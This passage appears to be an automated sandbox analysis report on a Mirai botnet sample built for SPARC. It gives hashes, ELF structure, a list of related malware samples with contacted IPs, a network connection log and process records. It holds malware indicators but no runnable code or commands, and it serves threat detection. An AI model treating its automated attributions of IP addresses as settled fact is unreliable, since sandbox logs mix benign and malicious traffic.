                                      momo.x86.elfGet hashmaliciousMiraiBrowse
                                      • 1.1.1.1
                                      momo.m68k.elfGet hashmaliciousMiraiBrowse
                                      • 1.1.1.1
                                      z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 172.71.176.132
                                      drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 104.26.13.205
                                      avaydna.exeGet hashmaliciousNjratBrowse
                                      • 104.17.25.14
                                      HateSpeech2024_Summary.pdf.lnk.bin.lnkGet hashmaliciousEmmenhtal Loader, MalLnkBrowse
                                      • 104.21.2.79
                                      paint.exeGet hashmaliciousBlank GrabberBrowse
                                      • 162.159.137.232
                                      K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.56.70
                                      CANONICAL-ASGBfuckunix.x86_64.elfGet hashmaliciousMiraiBrowse
                                      • 185.125.190.26
                                      momo.ppc.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      momo.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 185.125.190.26
                                      momo.x86.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      unix.x86.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      unix.arm5.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      main.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      fuckunix.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      Space.spc.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      main.mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 91.189.91.42
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                                      Entropy (8bit):6.185323642553051
                                      TrID:
                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                      File name:momo.spc.elf
                                      File size:92'776 bytes
                                      MD5:f4ba5fae397dfdff2a9427d7b15e7cb9
                                      SHA1:e98ca6734fa61703ae174c657e1cf49df024fe26
                                      SHA256:0a8a58067b462b3197bf1e150c189f0cbf7271f10e5fea0368836ab3eee9d69e
                                      SHA512:bea61fb501ee55547ef404dbc1bb2c0dc851dfd401befb9371f1f6f712a3ffbe850c375f7dd9b53e7cea389bee6808cb7ed21d108804bae84e59fdcf4df6ad94
                                      SSDEEP:1536:ESGxm/03HnIfHxb3imxMGzf16qDH5ps3tN6uERRFfiV0TFiqz:vwxKTvqDpw
                                      TLSH:AE937C32BE762E13C0D5707A11B74721F5E227CA31A8C72E7DB10E4AFF696502513A79
                                      File Content Preview:.ELF...........................4..h......4. ...(......................Vp..Vp..............`...`...`.......M.........dt.Q................................@..(....@.IK................#.....`...`.....!..... ...@.....".........`......$ ... ...@...........`....

                                      ELF header

                                      Class:ELF32
                                      Data:2's complement, big endian
                                      Version:1 (current)
                                      Machine:Sparc
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:UNIX - System V
                                      ABI Version:0
                                      Entry Point Address:0x101a4
                                      Flags:0x0
                                      ELF Header Size:52
                                      Program Header Offset:52
                                      Program Header Size:32
                                      Number of Program Headers:3
                                      Section Header Offset:92376
                                      Section Header Size:40
                                      Number of Section Headers:10
                                      Header String Table Index:9
                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                      NULL0x00x00x00x00x0000
                                      .initPROGBITS0x100940x940x1c0x00x6AX004
                                      .textPROGBITS0x100b00xb00x125640x00x6AX004
                                      .finiPROGBITS0x226140x126140x140x00x6AX004
                                      .rodataPROGBITS0x226280x126280x30480x00x2A008
                                      .ctorsPROGBITS0x360000x160000x80x00x3WA004
                                      .dtorsPROGBITS0x360080x160080x80x00x3WA004
                                      .dataPROGBITS0x360180x160180x8800x00x3WA008
                                      .bssNOBITS0x368980x168980x44780x00x3WA008
                                      .shstrtabSTRTAB0x00x168980x3e0x00x0001
                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x100000x100000x156700x156706.31310x5R E0x10000.init .text .fini .rodata
                                      LOAD0x160000x360000x360000x8980x4d104.12640x6RW 0x10000.ctors .dtors .data .bss
                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 5, 2025 15:29:29.323127985 CET442823778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:29.328059912 CET3778442821.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:29.328118086 CET442823778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:29.329107046 CET442823778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:29.333827972 CET3778442821.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:29.333865881 CET442823778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:29.338591099 CET3778442821.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:34.750335932 CET48202443192.168.2.13185.125.190.26
                                      Jan 5, 2025 15:29:39.339493036 CET442823778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:39.344434977 CET3778442821.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:50.698342085 CET3778442821.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:50.698702097 CET442823778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:50.699898958 CET442843778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:50.703543901 CET3778442821.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:50.704768896 CET3778442841.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:50.704828024 CET442843778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:50.705785990 CET442843778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:50.710628033 CET3778442841.1.1.1192.168.2.13
                                      Jan 5, 2025 15:29:50.710673094 CET442843778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:29:50.715486050 CET3778442841.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:06.750531912 CET48202443192.168.2.13185.125.190.26
                                      Jan 5, 2025 15:30:12.090306997 CET3778442841.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:12.090725899 CET442843778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:12.091485977 CET442863778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:12.095624924 CET3778442841.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:12.096256018 CET3778442861.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:12.096338034 CET442863778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:12.097359896 CET442863778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:12.102168083 CET3778442861.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:12.102230072 CET442863778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:12.107049942 CET3778442861.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:33.465790033 CET3778442861.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:33.466084003 CET442863778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:33.466901064 CET442883778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:33.470913887 CET3778442861.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:33.471704960 CET3778442881.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:33.471785069 CET442883778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:33.472793102 CET442883778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:33.477535963 CET3778442881.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:33.477581978 CET442883778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:33.482384920 CET3778442881.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:43.483175993 CET442883778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:43.488116026 CET3778442881.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:54.858234882 CET3778442881.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:54.858634949 CET442883778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:54.859568119 CET442903778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:54.863451958 CET3778442881.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:54.864322901 CET3778442901.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:54.864408970 CET442903778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:54.865482092 CET442903778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:54.870206118 CET3778442901.1.1.1192.168.2.13
                                      Jan 5, 2025 15:30:54.870286942 CET442903778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:30:54.875153065 CET3778442901.1.1.1192.168.2.13
                                      Jan 5, 2025 15:31:16.283400059 CET3778442901.1.1.1192.168.2.13
                                      Jan 5, 2025 15:31:16.283669949 CET442903778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:31:16.284508944 CET442923778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:31:16.289098024 CET3778442901.1.1.1192.168.2.13
                                      Jan 5, 2025 15:31:16.289737940 CET3778442921.1.1.1192.168.2.13
                                      Jan 5, 2025 15:31:16.289824963 CET442923778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:31:16.290879011 CET442923778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:31:16.296837091 CET3778442921.1.1.1192.168.2.13
                                      Jan 5, 2025 15:31:16.296897888 CET442923778192.168.2.131.1.1.1
                                      Jan 5, 2025 15:31:16.303946972 CET3778442921.1.1.1192.168.2.13

                                      System Behavior

                                      Start time (UTC):14:29:22
                                      Start date (UTC):05/01/2025
                                      Path:/tmp/momo.spc.elf
                                      Arguments:/tmp/momo.spc.elf
                                      File size:4379400 bytes
                                      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                      Start time (UTC):14:29:22
                                      Start date (UTC):05/01/2025
                                      Path:/tmp/momo.spc.elf
                                      Arguments:-
                                      File size:4379400 bytes
                                      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                      Start time (UTC):14:29:22
                                      Start date (UTC):05/01/2025
                                      Path:/tmp/momo.spc.elf
                                      Arguments:-
                                      File size:4379400 bytes
                                      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e